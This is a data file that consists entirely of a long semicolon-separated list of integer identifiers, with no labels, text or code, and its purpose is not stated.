126926;126927;126964;127076;126965;127101;127475;127476;127477;127478;82594;127480;127479;127481;127482;127483;127485;127484;127820;127920;127821;82645;127862;127863;127864;127865;127866;127922;127921;127923;127924;127925;82646;127926;127927;128038;128082;128121;128122;128123;128124;128179;128305;82167;82668;128306;128393;128394;128424;128395;128426;128425;128428;128427;82669;128509;128555;128556;128557;128558;128618;128619;128743;128777;128778;128779;82715;128780;128781;128880;128881;128882;128883;129025;129105;129304;129106;82716;129361;129305;129363;129362;129408;129409;129410;129411;129474;129475;82717;129505;129477;129476;129539;129571;129572;129594;129697;129595;82718;129734;129735;129765;129766;129799;129800;129828;129801;129853;129854;129855;82743;130029;130130;130131;130030;130031;130071;130132;130072;130182;130133;82784;130283;130284;130285;130286;130287;130405;130348;130406;130407;83002;130408;130522;130521;130523;130611;130770;130769;130771;130772;130773;130918;82785;130980;130979;131035;131084;131085;131134;131135;131137;131136;131138;82168;82805;131245;131246;131247;131248;131429;131430;131291;131292;131293;82837;131328;131329;131330;131331;131431;131433;131432;131435;131434;131436;131437;82860;131705;131740;131780;131781;131782;131783;131837;131960;131961;131962;82861;131963;131964;131965;132058;132059;132060;132080;132081;132105;132106;82862;132107;132267;132268;132325;132344;132345;132406;132346;132420;132421;82863;132422;132513;132514;132590;132592;132591;132593;132681;132682;133218;82904;132940;132758;132759;132941;132776;132777;132874;133102;133101;83060;133103;133104;133105;133150;133219;133228;133229;133276;133362;133318;83119;133277;133319;133320;133321;133322;133323;133324;133363;133364;133365;83142;133366;133411;133412;133414;133413;133509;133532;133561;133562;133654;82169;133655;83164;133656;133697;133698;133729;133728;133730;133772;133773;133813;83143;133814;133873;133875;133874;133876;133877;134240;134241;133967;134092;83144;134093;134125;134124;134126;134175;134176;134178;134177;134179;134180;83165;134181;134242;134182;134243;134244;134352;134245;134430;134429;83166;134431;134454;134432;134576;134630;134631;134632;134633;134683;134766;134716;83167;134767;134768;134769;134770;134771;134879;134880;134881;134915;134916;83168;134955;134982;134983;135098;135099;135100;135101;135102;135205;135190;135364;135363;135496;135495;135497;135498;136630;135596;135721;135722;135723;83190;135724;135939;135976;135975;135977;135978;135979;135980;135981;83476;136201;136067;136202;136068;136203;136204;136206;136205;136289;136288;82170;83498;136290;136366;136368;136367;136412;136427;136429;136428;136484;136951;83499;136631;136672;136673;136702;136674;136720;136832;136833;136834;136835;83545;136836;136893;136952;136980;136979;136982;136981;136983;136984;83500;136985;136987;136986;137008;137153;137205;137154;137206;137207;137248;137247;83531;137282;137339;137283;137371;137284;137372;137416;137418;137417;83747;137419;137572;137670;137671;137672;137841;137858;137859;137860;137861;137862;83819;137863;137886;137887;137906;137907;137908;137909;137910;137911;138062;83905;138063;138224;138064;138364;138389;138390;138391;138392;138393;83886;138529;138578;138781;138782;138858;138783;138859;138910;138911;138912;83864;138913;139009;139008;139094;139244;139095;139096;139098;139097;139207;82171;83865;139208;139209;139245;139246;139247;139248;139249;139251;139250;83866;139252;139297;139253;139340;139341;139387;139388;139428;139427;139429;139430;83887;139518;139519;139520;139552;139551;139624;139585;139625;139626;139627;83888;139628;139629;139630;139675;139703;139735;139756;139758;139757;139759;83906;139760;139773;139774;139775;139776;139876;140046;139928;140048;140047;83907;140049;140050;140051;140052;140053;140054;140055;140056;140057;140058;83918;140103;140134;140224;140225;140295;140296;140298;140297;140468;140469;83995;140538;140539;140540;140606;140541;140665;140931;140804;140932;140805;84023;140806;140807;140808;140809;140810;140934;140933;140935;141062;141131;84061;141132;141133;141134;141135;141136;141137;141247;141246;141286;141291;82172;84062;141272;141287;141271;141379;141378;141389;141463;141466;141794;141508;84093;141792;141791;142174;141901;141872;141910;142011;142052;142107;142105;84130;142159;142176;142202;142153;142169;142199;142206;142158;142155;84094;142504;142571;142546;143107;142551;142521;142632;142633;142616;142634;142623;84165;142670;142619;142861;142667;142827;142825;142832;142845;142849;142918;84166;142931;142926;142924;142936;143099;143109;143104;143133;143138;143170;84252;143169;143193;143185;143186;143224;143226;143336;143308;143323;143305;84253;143401;143386;143392;143410;143388;143440;143435;143459;143461;84294;143527;143512;143518;143519;143597;144097;143594;144022;144029;144023;144092;84295;144152;144099;144264;144262;144343;144494;144350;144439;144444;144441;82173;84296;144490;144497;144478;144541;144595;144574;144587;144681;144636;144627;84297;144638;144666;144657;144738;144723;144725;144735;144758;144762;144814;84349;144825;144924;144836;144956;144925;145217;145167;145208;145165;84407;145237;145259;145384;145427;145437;145475;145531;145772;145724;145725;146163;84408;146053;146155;146129;146133;146191;146119;146278;146291;146283;146324;84433;146321;146372;146361;146360;146466;146473;146527;146521;146512;84434;146504;146555;146609;146612;146610;146700;146604;146602;146608;146736;146666;84435;146699;146665;146677;146725;146667;146887;146919;146893;146945;146981;84447;146974;146968;147179;147182;147176;147187;147532;147548;147685;147744;84448;147772;147797;147800;147775;147903;147813;147898;147902;147901;82174;84471;147926;147928;148072;148080;147960;148053;148173;148166;148146;84472;148206;148272;148254;148275;148270;148301;148302;148311;148312;148323;148322;84473;148363;148416;148440;148442;148508;148610;148623;148701;148749;148762;84494;148927;148926;148965;149008;149016;149004;149003;149015;149014;149019;149009;84495;149034;149036;149037;149040;149103;149246;149344;149262;84507;149261;149345;149339;149372;149342;149426;149427;149460;149423;149492;149485;84508;149488;149517;149518;149515;149568;149854;149889;150005;150107;150111;150097;150099;150173;150262;150255;150272;150303;150301;150309;150333;84551;150467;150336;150454;150453;150703;150796;150806;150805;150904;84597;150985;150984;151006;151044;151111;151028;151361;151131;151192;151264;82175;151265;84676;151219;151369;151368;151370;151373;151480;151486;151516;151676;84677;151677;152075;151812;151829;151891;151834;153148;152012;152006;152078;152059;84812;152171;152170;152228;152194;152193;152215;84831;152217;152214;152223;152349;152547;152519;152383;152384;152486;152517;84832;152662;152535;154200;152737;152607;153132;152723;152739;152773;152898;84833;152899;152966;152983;152982;153026;153217;153216;153226;153480;153431;84834;153482;153481;153548;153571;153601;153600;153772;153741;153843;153811;84835;153809;153808;153810;153845;153846;153841;153842;153844;153966;153965;84885;154114;153994;153996;154021;154020;154195;154237;154257;154331;84932;154330;154427;154410;154627;154733;154514;154736;154735;154731;154752;82176;84989;154739;154747;154749;154751;154753;154754;154882;154881;154936;154923;84990;154920;154950;155013;155016;155014;155123;155060;155312;155346;155439;84991;155440;155604;155622;155639;155658;155675;155683;155712;155711;85050;155710;155707;155713;155721;155739;155740;155738;155822;155861;155922;155848;85051;155924;155921;156018;156039;156163;156159;156160;156234;156173;156315;85052;156318;156314;156396;156329;156332;156320;156322;156321;156328;156335;85128;156334;156333;156336;156384;156385;156386;156391;156393;156394;156392;85233;156449;156417;156418;156419;156576;156575;156457;156691;156690;156789;85278;156765;156766;156770;156965;156964;156818;156773;85279;156794;156920;156954;156955;156963;157055;157048;157047;157058;157255;82177;157262;85280;157250;157252;157254;157248;158247;157261;157324;157365;157321;157379;85418;157397;157401;157407;157409;157846;157901;158026;158032;85465;158035;158049;158045;158067;158084;158170;158196;158450;158510;85419;158511;158647;158649;158681;158675;158676;158685;159090;158698;158747;85546;158819;158783;158821;158820;158850;158978;158933;85547;158996;159003;159002;159001;159069;159072;159076;159079;159077;159116;85584;159141;85585;85586;85654;82178;85655;85656;85663;85695;85769;85807;85897;85808;85888;85931;82179;86049;86021;86022;86195;86127;86154;86155;86196;86197;86211;82180;86212;86213;86225;86226;86227;86357;86406;86428;86429;86446;82181;86551;86552;86553;86578;86579;86640;86641;86676;86677;86712;82182;159140;86793;86794;86920;86907;86952;86953;87056;87068;87069;87070;82183;87072;87071;87073;87074;87075;87076;87111;87112;87186;82184;87265;87266;87268;87267;87286;87287;87315;87316;87330;87382;82185;87427;87605;87508;87606;92678;87607;87682;87738;87683;87729;87850;87826;87884;87897;87931;87932;87933;87956;82186;87957;87958;87975;87977;87976;87978;87993;87994;88105;88023;88106;82187;88107;88108;88387;88422;88388;88491;88492;88493;88494;88511;82188;88599;88580;88600;88627;88724;88740;88764;88766;88765;82189;88810;88863;88845;88864;88887;88886;88913;88938;88914;88939;88940;82190;88971;88972;88974;88973;88995;88997;88996;88998;88999;89040;89000;82191;89041;89042;89043;89045;89044;90803;90805;90804;90806;82192;90807;90870;90869;90871;90872;90873;90874;90895;90926;90943;82193;90944;90945;91021;91022;91049;91050;91107;91051;91108;91109;82194;91132;91133;91134;91135;91136;91137;91196;91197;91173;91198;82195;91242;91243;91264;91265;91299;91286;91287;91323;91324;91325;82196;91358;91326;91359;91361;91360;91362;91363;91395;91396;82197;91444;91397;91445;91472;91521;91522;91489;91446;91505;91523;91548;82198;91574;91575;91576;91577;91578;91613;91688;91687;91689;91770;82199;91690;91691;91733;91789;91771;91831;91832;91834;91833;91835;82200;91836;91859;91860;91900;91901;91903;91902;91904;91905;91919;91920;91921;91948;91922;91977;91978;91979;92665;92324;92003;82201;92325;92326;92380;92474;92500;92524;92501;92544;92545;82202;92546;92547;92568;92569;92570;92613;92631;92762;92587;92632;92633;82203;92634;92635;92636;92637;92638;92004;92639;92640;92763;92641;82204;92683;92705;92704;92727;92729;92728;92827;92794;92793;92828;92829;92873;92874;92969;92970;92953;93017;93053;82205;93054;93083;93130;93199;93131;93132;93133;93236;93320;93321;82206;93322;93353;93323;93385;93413;93386;93415;93416;93414;93417;82207;93543;93485;93544;93545;93564;93565;93566;93567;93568;93569;82208;93570;93612;93620;93667;93688;93689;93690;93746;93691;93692;82209;93831;93832;93834;93833;93847;93868;93869;82210;93900;93913;93969;93968;93970;94075;94100;94077;94076;94078;82211;94101;94110;94102;94112;94113;94114;94111;94141;94142;94143;82212;94144;94145;94184;94204;94293;94233;94255;94257;94256;94258;82213;94294;94295;94296;94298;94297;94299;94300;94343;94411;94410;82214;94447;94448;94474;94473;94475;94476;94477;94518;94519;82215;94520;94583;94585;94586;94587;94612;94764;94584;94916;82216;94917;94940;94983;95029;95030;94941;95031;95261;95262;95263;82217;95296;95357;95359;95358;95360;95399;95412;95413;95454;82218;95455;95456;95457;95485;95486;95601;95635;95634;95653;95654;95664;82219;95665;95774;95775;95899;96005;96007;96006;96009;96008;82220;96010;96011;96012;96013;96014;95955;95954;96051;96093;96094;96085;82221;96095;96096;96097;96098;96100;96099;96155;96183;96184;96185;82222;96186;96187;96188;96189;96190;96191;96272;96192;96343;96396;82223;96458;96459;96490;96491;96492;96493;96535;96536;96537;96570;82224;96634;96635;96636;96665;96666;96732;96704;96814;96779;82225;96815;96816;96817;96818;96839;96840;96841;96882;96883;96884;82226;96909;96911;96910;96930;96931;96963;96983;97029;97087;97052;82227;97105;97106;97150;97195;97216;97231;97088;97232;97233;97234;97235;82228;97356;97236;97332;97392;97394;97393;97395;97396;97418;82229;97437;97438;97440;97439;97441;97473;97559;97614;97588;82230;97641;97640;97642;97669;97668;97697;97698;97780;97782;97781;97796;82231;97797;97799;97798;97898;97899;97920;97921;97963;82232;97964;97965;97966;99000;99001;99002;99042;99003;99043;99045;82233;99107;99139;99044;99187;99188;99189;99202;99251;99250;99252;99253;82234;99269;99268;99270;99271;99291;99401;99442;99402;99403;99420;82235;99421;99422;99443;99542;99543;99544;99600;99601;99602;99603;82236;99636;99637;99638;99639;99672;99604;99673;99674;99692;99693;82237;99715;99694;99734;99733;99735;99736;99737;99738;99739;99740;82238;99919;99997;99998;99999;100069;100107;100108;100109;100110;100133;82239;100162;100176;100177;100225;100226;100227;100302;100303;100304;100330;82240;100360;100390;100431;100473;100474;100475;100476;100477;100478;100479;100480;82241;100513;100481;100482;100575;100514;100515;100516;100517;100518;82242;100519;100559;100576;100577;100578;100602;100622;100624;100623;100672;82243;100645;100673;100724;100771;100772;100796;100816;100817;100848;100849;82244;100850;100851;100875;100876;100939;100941;100940;100966;101006;101007;14848;14850;14849;14851;14853;14852;14855;14854;14857;14856;14858;14859;14860;14861;14862;14863;14864;14865;14866;14867;14868;14869;14870;14871;14872;14873;14874;14875;14876;14877;14878;14879;14880;14881;14882;14883;38953;14885;14887;14886;14888;14889;14890;14891;14892;14893;14894;14895;14897;14896;14898;14899;14901;14900;14902;14903;14905;14904;14906;14907;14908;14909;14910;14911;14912;14913;14914;14915;14916;14917;14918;14919;14920;14921;14922;14923;14924;14925;14926;14927;14928;14929;14930;14931;14932;14933;14934;14935;14936;14937;22542;22543;22544;22545;22546;22547;22548;22549;22550;22551;14938;22552;22553;22554;22555;22556;22557;22558;22559;22560;14939;22561;22563;22562;22564;22565;22566;22567;22568;22569;22570;22571;14940;22572;22573;22574;22575;22576;22577;22578;22579;22580;22581;14941;22582;22583;22584;22585;22587;22586;22589;22588;22590;22591;14942;22592;22594;22593;22595;22596;22597;22598;22599;22600;22601;14943;22602;22603;22604;22605;22606;22607;22608;22610;22609;14944;22611;22613;22612;22614;22615;22616;22617;22619;22618;22620;22621;14945;22622;22623;22624;22625;22626;22627;22628;22629;22630;22631;14946;22632;22633;22634;22635;22636;22637;22638;22640;22639;22641;14947;22642;22643;22644;22646;22645;22647;22648;22649;22650;22651;14948;22652;22653;22654;22655;22656;22657;22658;22659;22661;22660;14949;22662;22663;22664;22665;22666;22667;22668;22669;22670;22671;14950;22672;22673;22674;22675;22677;22676;22678;22679;22680;22681;22682;14951;22683;22684;22686;22685;22688;22687;22689;22690;22691;14952;22692;22693;22694;22695;22696;22697;22698;22699;22700;22701;14953;22702;22703;22704;22705;22706;22707;22708;22709;22710;22711;14954;22712;22713;22714;22715;22717;22716;22718;22719;22721;22720;14955;22722;22724;22723;22725;22726;22728;22727;22729;22730;22731;22904;22732;22733;22734;22735;22881;22905;22906;22907;22908;14957;22927;22931;22934;22935;22936;22937;23655;23656;23657;23658;14958;23660;23659;23662;23661;23701;23700;23703;23702;23704;23742;23737;14959;23743;23757;23765;23766;23767;23844;23768;23770;23790;14960;23791;23792;23845;23846;23847;23848;23849;23912;23911;14961;23913;23945;23946;23948;23947;23949;25339;24006;25225;24025;24026;14962;24247;24248;24291;24292;24293;24294;24295;24297;24296;24346;14963;24359;24347;24765;24776;24793;24794;24819;24834;24865;24835;14964;24879;24880;24881;24921;25008;25009;25010;25011;25012;25096;14965;25097;25098;25099;25100;25151;25152;25153;25176;25177;14966;25226;25227;25228;25229;25258;25299;25259;25300;25301;25356;25455;14967;25463;25503;25464;25465;25504;25529;25505;25506;25531;25530;25532;14968;25555;25556;25557;25558;25581;25582;25583;25584;25585;14969;25586;25615;25616;25628;25629;25638;25675;25640;25639;25676;14970;25677;25678;25695;25742;25743;25744;25779;25780;25801;25781;25782;14971;25851;25825;25826;25852;25853;25855;25854;25856;25857;14972;25858;25859;25860;25861;25887;25936;25937;25909;25938;25959;14973;25961;25960;25962;25963;25964;25965;25966;25974;26029;26030;14974;26031;26032;26033;26034;26035;26078;26079;26080;26208;26209;26210;14975;26975;26211;26930;26931;26976;27043;27066;27515;27544;14976;27545;27546;27548;27547;27549;27577;27587;27621;27628;27629;14977;27804;27630;27819;27842;27843;28150;28151;28297;28253;28298;14978;28299;28300;28301;28336;28337;28338;28339;29191;29192;29226;14979;29227;29228;29257;29258;29259;29260;29261;29262;29263;29337;14980;29338;29339;29705;29706;29707;29755;29756;29803;29805;29806;29807;14981;29836;29808;29837;29838;29839;29840;29856;29857;29858;29859;14982;29860;29861;29872;29873;29902;29903;29904;29935;29936;14983;29937;29938;29939;29968;29984;30000;30023;30059;30061;30060;14984;30062;30063;30064;30065;30066;30067;30111;30112;30125;30126;14985;30188;30189;38954;30223;30225;30224;30155;30226;30227;30228;14986;30229;30230;30231;31028;30232;31056;31055;31123;31102;31143;14987;31144;31145;31146;31147;31149;31148;31150;31151;31169;31170;14988;31303;31358;31359;31360;31425;31426;31587;31588;31589;31590;14989;31591;31592;31628;31629;31630;31631;31632;31661;31662;38955;14990;31687;31663;31709;31710;31711;31806;31721;31807;31809;31808;14991;31810;31948;31811;31950;31949;31951;31952;31969;32003;32004;14992;32005;32006;32007;32008;32034;32035;32057;32058;32059;14993;32060;32084;32085;32086;32125;32126;32127;32140;32141;32142;32143;14994;32144;32305;32307;32306;32309;32308;32378;32377;32379;32380;14995;32402;32403;32404;32405;32406;32407;32435;32447;32457;32448;14996;32482;33077;33173;33174;33175;33177;33176;33178;33230;14997;33367;33401;33402;33403;33450;33467;33491;33492;33507;14998;33508;33527;33551;33552;33566;33567;33568;33737;33738;33739;14999;33740;33741;33764;33773;33772;33774;33775;33826;33933;33934;15000;34033;34032;34053;34087;34088;34163;34171;34212;34223;34246;15001;34253;34254;34255;34352;34340;34354;34353;34370;34355;34371;15002;34386;34387;34388;34392;34415;34444;34449;34450;34478;34492;15003;34500;34700;34669;34745;34720;34757;34810;34823;34937;15004;34938;34949;34950;34973;34975;34974;35010;34995;35031;35011;35032;15005;35033;35036;35083;35061;35077;35091;35106;35225;35174;35252;15006;35253;35254;35275;35276;35293;35294;35313;35314;35329;35333;35334;15007;35365;35364;35366;35378;35382;35383;35425;35384;35431;15008;35461;35463;35547;35548;35549;35550;35567;35612;35622;35637;15009;35638;35662;35663;35664;35691;35692;35738;35752;35739;35754;15010;35755;35762;35763;35764;35790;35901;35902;35907;35908;35991;15011;35924;35992;35925;35932;35958;35967;35968;35979;35980;35987;15012;35988;35989;35993;36046;36040;36134;36047;36066;36067;36052;15013;36053;36076;36084;36118;36090;36119;36120;36123;36135;15014;36142;36146;36164;36172;36173;36189;36174;36207;36208;36843;38158;15015;38202;38640;38641;38642;38656;38666;38667;38690;38668;38691;15016;38692;38696;38702;38703;38722;38723;38704;38724;38725;38747;15017;38795;38833;38869;38859;38878;38861;38880;39332;38980;38990;15018;38991;38992;39333;39374;39334;39391;39439;39440;39441;15019;39451;39483;39452;39495;39568;39569;44690;44691;44692;44693;44694;15020;44695;44696;44697;44698;44699;44700;44702;44701;44703;44704;15021;44705;44706;44707;44708;44709;44710;44712;44711;44713;44714;15022;44715;44717;44716;44718;44719;44721;44720;44722;44723;44724;15023;44725;44726;44727;44728;44729;44731;44730;44732;44733;44734;15024;44735;44736;44737;44738;44740;44739;44742;44741;44743;44744;15025;44745;44746;44747;44748;44749;44750;44751;44752;44753;44754;15026;44755;44756;44757;44758;44759;44760;44761;44762;44763;44764;15027;44765;44766;44767;44768;44769;44770;44772;44773;44774;15028;44775;44776;44777;44778;44779;44780;44781;44782;44783;44784;15029;44785;44786;44787;44788;44790;44789;44791;44792;44794;44793;15030;44795;44796;44797;44798;44799;44800;44801;44802;44803;44804;15031;44806;44805;44808;44807;44810;44809;44811;44812;44814;44813;15032;44815;44816;44817;44818;44819;44820;44821;44822;44823;44824;44825;15033;44826;44827;44828;44829;44830;44831;44832;44834;44833;15034;44835;44836;44837;44838;44839;44841;44840;44843;44842;15035;44844;44845;44846;44848;44847;44849;44850;44851;44852;44853;44854;15036;44855;44856;44858;44857;44859;44860;44862;44861;15037;44863;44864;44865;44866;44867;44950;44970;44951;44988;45008;15038;45025;45027;45026;45055;45054;45056;45069;45062;45057;45094;45113;15039;45123;45134;45337;45396;45369;45407;45397;45412;45427;45428;15040;45445;45479;45480;45546;45556;45558;45557;45559;45560;45612;15041;46226;46213;46314;46243;46315;46316;46346;46352;46707;15042;46708;46709;46710;46724;46725;46829;46830;46831;46832;46861;46862;15043;46875;47103;47104;47105;47154;47153;47584;47589;47704;47705;47735;15044;47767;47736;47792;47791;47890;47889;48220;48221;48222;15045;48223;48224;48225;48240;48241;48247;48248;48249;48256;48384;15046;48270;48344;48385;48386;48387;48895;48896;48924;48925;48928;15047;49057;49058;49103;49114;49121;49150;49184;49151;49231;49275;15048;49276;49277;49291;49292;49676;49717;49766;49767;49815;49965;15049;49966;50024;50309;50452;50696;50453;50826;50825;50864;15050;50865;51127;51128;51181;51180;51397;51398;51399;51400;51401;15051;51427;51428;51440;51531;51530;51556;51557;51558;51559;15052;51588;51665;51677;51817;51819;51818;51828;51829;51862;51945;51946;15053;51959;51977;51978;51979;52027;52028;52029;52030;52031;52032;15054;52037;52055;52056;52461;52462;52463;52484;52511;52512;52513;15055;52548;52537;52549;52550;52600;52551;52618;52619;52621;52620;15056;52637;52660;52674;52691;52718;52720;52719;52758;52741;52946;15057;52947;52948;52949;52997;52998;53198;53211;53212;53224;53259;15058;53260;53304;53324;53340;53341;53342;53343;53344;53393;53477;15059;53495;53496;53505;53506;53507;53558;53559;53602;53604;53603;15060;53605;53832;53833;53861;53860;53862;53880;53900;54588;15061;55027;55029;55028;55030;55031;55032;55033;55034;55035;55036;55037;15062;55038;55039;55040;55041;55042;55043;55045;55044;55065;55066;15063;55136;55145;55146;55164;55280;55170;55486;55487;55488;55489;15064;55490;55491;55516;55537;55524;55538;55554;55555;55610;55624;15065;55625;55641;55672;55673;55674;55694;55708;55721;55722;55769;15066;55770;55776;55820;55841;55852;55888;55889;55942;55998;56025;15067;56026;56074;56116;56143;56130;56144;56231;56145;56167;15068;56179;56307;56285;56340;56339;56381;56393;56394;56395;56409;56414;15069;56415;56443;56444;56669;56571;56586;56622;56623;56624;56662;15070;56663;56670;56671;56672;56714;56715;56727;56716;56728;56729;15071;56730;56759;56761;56760;56785;56786;56850;56856;56882;56881;56883;15072;56884;56923;56929;56982;56986;56987;56999;57499;57500;15073;57501;57502;57503;57504;57505;57507;57506;57508;57509;15074;57510;57512;57511;57513;57514;57515;57516;57517;57518;57519;15075;57520;57521;57522;57523;57525;57524;57526;57527;57542;57583;15076;57543;57621;57643;57693;57735;57702;57737;57736;57738;57753;15077;57811;57812;57813;57814;57827;57851;57879;57880;57925;57963;15078;57964;58012;58011;58043;58077;58078;58110;58135;58097;58136;15079;58148;58172;58198;58173;58199;58200;58251;58250;58295;58277;15080;58303;58304;58324;58391;58357;58393;58392;58436;58417;58437;15081;58459;58485;58460;58486;58530;58541;58598;58667;58608;58728;15082;58729;58753;58754;58766;58804;58817;58853;58854;58855;58883;58880;15083;58884;58908;58978;58969;59059;59060;59061;59062;15084;59070;59093;59094;59166;59167;59183;59182;59215;59216;59250;59251;15085;59758;59760;59759;59762;59761;59764;59763;59765;59766;59767;15086;59769;59768;59770;59771;59772;59773;59774;59775;59776;59777;15087;59778;59780;59779;59781;59782;59824;59825;59839;60088;59890;15088;60002;59961;60003;60004;60068;60005;60156;60142;61374;61382;15089;61401;61415;61438;61439;61440;61441;61495;61520;61537;15090;61538;61555;61578;61627;61652;61662;61723;61734;61735;62000;61792;15091;62011;62012;62013;62014;62015;62016;62049;62067;62086;62113;15092;62188;62225;62285;62317;62318;62440;62452;62448;62453;62599;15093;62643;62644;62664;62665;62666;62667;62721;62722;62723;15094;62748;62778;62804;62872;62805;62949;62929;63125;63028;63068;63114;15095;63126;63151;63188;63194;63193;63270;63269;63271;63272;63273;15096;63335;63341;63356;63342;63357;63358;63359;63382;63384;63383;15097;63385;63433;63386;63456;63457;63512;63511;63556;63557;15098;63582;63640;63648;64082;64364;64395;64439;64396;64493;64397;64553;15099;64623;64591;64635;64624;64648;64649;64662;64663;64671;64880;64732;15100;64867;64881;64897;64898;64972;64973;64995;64996;65033;15101;65556;65178;65179;65228;65557;65558;65584;65581;65582;65585;15102;65586;65635;65695;65696;65793;65744;65727;65812;65921;66159;15103;66004;66028;66296;66180;66281;66383;66384;66431;66486;15104;66546;66547;66548;66557;66558;66560;66559;66562;66561;15105;66563;66564;66565;66566;66567;66569;66568;66570;66571;66572;66573;15106;66574;66576;66575;66603;66602;66677;66676;66678;66916;15107;66766;66767;66768;66792;66846;66847;66851;66852;66905;66906;66910;15108;66917;66936;66974;66937;66976;67100;67101;67102;67131;67236;15109;67201;67202;68889;68942;68970;68971;69083;69094;69084;69107;15110;69109;69108;69227;69197;69228;69277;69313;69354;69398;69435;69459;15111;69470;69473;69484;69483;69506;69505;69522;69523;69542;15112;69780;69781;69884;69813;69841;69848;69885;69895;69938;69959;69960;15113;70002;70080;70128;70105;70148;70200;70201;70303;70353;15114;70354;70355;70372;70373;70374;70375;70402;70401;70403;70417;15115;70502;70503;70533;70534;70548;70636;70664;70652;70722;70733;15116;70737;70748;70749;70807;70981;70982;70983;70984;70985;70986;15117;71080;71025;71097;71055;71098;71118;71146;71141;71220;71180;15118;71221;71275;71254;71276;71277;71278;71402;71442;71474;71497;15119;71502;71526;71527;71528;71541;71585;71586;71618;71764;71769;15120;71778;71779;71780;71781;71782;71848;71802;71849;71850;71867;15121;71902;71911;71933;71934;71980;72010;72011;72109;72046;72239;15122;72240;72248;72375;72353;72354;72355;72401;72412;72439;72438;15123;72440;72537;72538;72562;72610;72647;72611;72758;72655;72782;15124;72886;72911;72912;72952;72989;72990;72991;72992;72994;72993;73065;15125;73139;73106;73214;73164;73215;73216;73239;73238;15126;73254;73255;73256;73278;73293;73350;73351;73388;73421;73440;15127;73441;73485;73465;73486;73501;73534;73581;73599;73713;73625;15128;73626;73657;73691;73714;73715;73743;73744;73745;73844;73855;15129;73856;73866;73867;73869;73868;73924;73971;73997;74027;74043;15130;74045;74044;74095;74096;74129;74097;74164;74197;74256;15131;77306;74277;74278;74279;74280;74294;74313;74314;74315;74336;15132;74338;74337;74375;74374;74381;74476;74477;74498;74499;76057;15133;76081;76082;76090;76091;76171;76194;76172;76219;76285;76286;15134;76299;76349;76387;76417;76418;76433;76465;76477;76499;76583;15135;76599;76689;76605;76606;76717;76690;76841;76842;76843;76844;15136;76857;76858;76884;76949;76950;76976;76977;77007;77035;77100;15137;77101;77102;77111;77122;77123;77202;77240;77287;77343;77307;15138;77344;77358;77418;77419;77422;77468;77469;77510;77511;77547;15139;77610;77585;77611;77637;77671;77715;77716;77751;77752;77762;77763;15140;77824;77825;77880;77881;77882;77919;77920;77921;15141;77973;78027;78026;78044;134330;78045;78046;78047;78091;78092;78449;15142;78563;78518;78519;78520;78589;78659;78681;78695;78694;78725;15143;78785;78784;78833;78834;78896;78861;78898;78897;79064;79065;15144;79066;79190;79221;79255;79339;79564;79362;79600;79586;15145;79627;79628;79629;79636;79637;79669;79696;79697;79728;79729;79730;15146;79731;79806;79805;79808;79807;79883;79882;79884;79885;79886;15147;79888;79887;79889;79890;80057;80058;80126;80207;80127;80208;80229;15148;80284;80230;80285;80255;80286;80307;80308;80361;80393;15149;80401;80420;80421;80444;80445;80446;80462;80528;80558;80573;15150;80574;80833;80834;80871;80872;80970;80972;80971;80973;81006;15151;81027;81028;81029;81056;81090;81109;81110;81111;15152;81129;81131;81130;81150;81149;81189;81211;134331;81250;81251;81279;81301;15153;81302;81409;81413;81444;81445;81446;81447;81426;15154;81448;81450;81449;81527;81526;81555;81528;81556;81747;81598;81607;81654;15155;81760;81748;81794;81793;81795;81830;81831;81832;81833;15156;81835;81834;81836;81899;81900;81926;81927;81955;81982;81983;15157;81984;81999;82000;82001;82048;82302;82303;82304;82305;15158;82432;82511;82512;82538;82595;82622;82624;82623;82670;82719;82720;15159;82721;82722;82744;82745;82746;82838;82806;82839;82865;82864;82929;15160;82930;83003;83062;83061;83063;83064;83120;83065;83145;15161;83146;83147;83191;83192;83193;83231;83232;83233;83234;83235;15162;83236;83253;83273;83306;83307;83335;83308;83336;83381;83422;15163;83423;83501;83532;83546;83547;83748;83775;83784;83785;83786;15164;83787;83788;83789;83820;83889;83908;83919;83960;83980;84024;15165;84025;84026;84063;84167;84168;84169;84170;84171;84200;15166;84298;84277;84299;84300;84350;84436;84373;84449;84474;84509;15167;84510;84511;84552;84598;84599;84626;84649;84650;84836;84837;84838;15168;84933;84839;84965;84992;85031;84993;85032;85053;15169;85129;85130;85162;85161;85164;85163;85165;85184;85352;85281;15170;85353;85354;85355;85356;85357;85388;85466;85517;85587;85588;15171;85589;85569;85590;85657;85664;85696;85726;85753;85755;85754;85756;15172;85770;85809;85810;85851;85898;85912;85914;85913;85915;15173;85944;86023;86024;86025;86050;86107;86108;86156;86157;86303;15174;86304;86329;86375;86430;86447;86448;86486;86580;86581;86582;15175;86642;86618;86665;86666;86678;86679;86680;86681;15176;86682;86700;86713;86727;86728;86772;86795;86832;86833;86888;86921;15177;86998;86954;87057;87058;87077;87078;87080;87079;87162;87163;15178;87164;87175;87187;87288;87212;87331;87289;87359;87360;87383;15179;87384;87428;87430;87429;87431;87479;87509;92679;87510;87511;15180;87541;87608;87739;87740;87684;87742;87741;87827;87828;87851;87829;15181;87852;87853;87898;87899;87900;87901;87979;87934;87995;87996;15182;88024;88110;88109;88389;88423;88424;88425;88427;88426;15183;88462;88495;88496;88497;88498;88499;88568;88581;88602;88601;15184;88628;88629;88631;88630;88702;88725;88727;88726;88741;88728;88865;15185;88768;88767;88846;88866;88867;88868;88915;88869;88941;88916;88942;15186;88943;88975;88976;89001;89046;89002;89003;89004;89005;15187;89061;89121;89062;89694;89122;89695;89696;89697;89698;15188;89791;89792;89793;89851;89794;89877;89876;89878;89926;89972;90030;15189;90031;90032;90033;90070;90071;90101;90125;90160;90126;90127;15190;90205;90206;90207;90252;90277;90278;90279;90280;90281;90322;15191;90323;90369;90370;90371;90409;90410;90453;90454;90515;90549;15192;90550;90551;90552;90686;90638;90687;90688;90724;90725;90767;15193;90768;90808;90838;90839;90840;90841;90896;90897;90927;90928;15194;90929;91023;91024;91025;91052;91110;91138;91139;91140;91174;15195;91175;91199;91200;91244;91266;91288;91300;91365;91364;91366;15196;91430;91429;91431;91447;91473;91474;91490;91506;91524;91549;15197;91550;91614;91615;91616;91692;91693;91837;91891;91886;91906;91892;15198;91923;91907;91924;91925;91926;91927;91965;92224;15199;92327;92381;92328;92475;92382;92502;92525;92526;92548;92527;15200;92571;92572;92573;92588;92614;92642;92643;92644;92666;92730;92706;15201;92731;92954;92955;92764;92795;92956;92875;92957;93018;92958;15202;93114;93019;93116;93115;93117;93134;93237;93238;93254;93324;15203;93354;93325;93387;93418;93419;93420;93486;93546;93547;93548;15204;93549;93613;93621;93668;93669;93693;93694;93695;93723;93747;15205;93748;93835;93836;93837;93838;93848;93849;93870;93871;93914;15206;